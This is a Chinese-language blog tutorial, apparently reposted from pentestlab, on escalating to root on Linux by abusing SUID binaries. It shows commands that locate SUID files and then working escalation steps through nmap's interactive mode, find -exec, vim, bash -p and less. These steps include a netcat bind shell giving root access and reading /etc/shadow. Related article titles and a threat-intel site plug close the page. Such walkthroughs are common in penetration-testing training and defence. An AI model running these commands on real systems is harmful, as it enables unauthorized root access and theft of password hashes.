Linux提權————利用SUID提權
前言
今天給大家帶來的是linux下的提權技巧。
SUID是Linux的一種許可權機制,具有這種許可權的檔案會在其執行時,使呼叫者暫時獲得該檔案擁有者的許可權。如果擁有SUID許可權,那麼就可以利用系統中的二進位制檔案和工具來進行root提權。
已知的可用來提權的linux可行性的檔案列表如下:
- Nmap
- Vim
- find
- Bash
- More
- Less
- Nano
- cp
以下命令可以發現系統上執行的所有SUID可執行檔案。具體來說,命令將嘗試查詢具有root許可權的SUID的檔案。
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
以上所有二進位制檔案都將以root使用者許可權執行,因為它們的許可權中包含"s",並且對應的是root許可權。
ls -l /usr/bin/nmap
-rwsr-xr-x 1 root root 780676 2008-04-08 10:04 /usr/bin/nmap
NMAP
較舊版本的Nmap(2.02至5.21)具有互動模式,允許使用者執行shell命令。由於Nmap在使用root許可權執行的二進位制檔案列表中,因此可以使用互動式控制檯來執行具有相同許可權的shell。
nmap -V
互動模式可以通過執行Nmap引數" interactive "
nmap --interactive
以下命令將提供一個提升的shell。
nmap> !sh
sh-3.2# whoami
root
也可以通過Metasploit模組對Nmap的二進位制檔案進行許可權提升。
exploit/unix/local/setuid_nmap
Find
如果Find命令也是以Suid許可權執行的話,則將通過find執行的所有命令都會以root許可權執行。
touch pentestlab
find pentestlab -exec whoami \;
大部分Linux作業系統都安裝了netcat,因此也可以被利用來將許可權提升至root。
find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;
連線上去就會直接獲取到一個Root許可權的shell。
netcat 192.168.1.189 5555
id
cat /etc/shadow
VIM
Vim是Linux環境下的一款檔案編輯器。但是,如果以SUID執行的話,它會繼承root使用者的許可權,因此可以讀取系統上的所有檔案。
vim.tiny /etc/shadow
vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell
Bash
以下命令將以root許可權開啟一個bash shell。
bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(serv
Less
Less和More都執行以用來提權。
less /etc/passwd
!/bin/sh
獲取到Root許可權
參考資料
https://pentestlab.blog/2017/09/25/suid-executables/
http://blog.csdn.net/haofeifei6/article/details/11516753
威脅情報分析平臺
最近在做一些威脅情報分析,apt攻擊源分析中,發現了一個很好的平臺,給大家推薦一下。
http://www.secange.com/2017/10/%E5%A8%81%E8%83%81%E6%83%85%E6%8A%A5%E5%88%86%E6%9E%90%E5%B9%B3%E5%8F%B0/
平臺地址:http://www.vxcube.com
相關文章
- Linux-SUID提權LinuxUI
- Linux 提權-SUID/SGID_2LinuxUI
- Linux 提權-SUID/SGID_1LinuxUI
- Linux 提權-核心利用Linux
- Linux 提權Linux
- Linux提權Linux
- Linux提權-70種sudo提權彙總Linux
- linux sudo提權Linux
- Linux 提權-CapabilitiesLinux
- Linux利用UDF庫實現Mysql提權LinuxMySql
- Linux提權————Linux下三種不同方式的提權技巧Linux
- Linux 提權-MySQL UDFLinuxMySql
- Linux 提權-NFS 共享LinuxNFS
- Linux 提權-LXD 容器Linux
- Linux 提權-Docker 容器LinuxDocker
- Linux 提權-Cron JobsLinux
- 利用萬用字元進行Linux本地提權字元Linux
- Linux提權-許可權升級Linux
- Windows提權實戰——————3、PcAnyWhere提權WindowsPCA
- Linux 提權-Sudo_1Linux
- Linux 提權-Sudo_2Linux
- windows提權--組策略首選項提權Windows
- 本地提權
- Linux、Windows提權命令速記LinuxWindows
- Linux 提權-密碼搜尋Linux密碼
- linux 普通使用者提權Linux
- Linux使用者提權管理方案Linux
- windows提權 (一)Windows
- mysql UDF提權MySql
- SQL Sever提權SQL
- Windows令牌竊取提權和爛土豆提權學習Windows
- 利用Serv-u提權的簡單思路
- 在Windows低許可權下利用服務進行提權Windows
- Windows提權實戰——————1、IIS6.exe提權實戰Windows
- 用於提權的Linux命令,即“xxd”Linux
- Windows提權系列————上篇Windows
- Windows提權系列————下篇Windows
- Windows提權總結Windows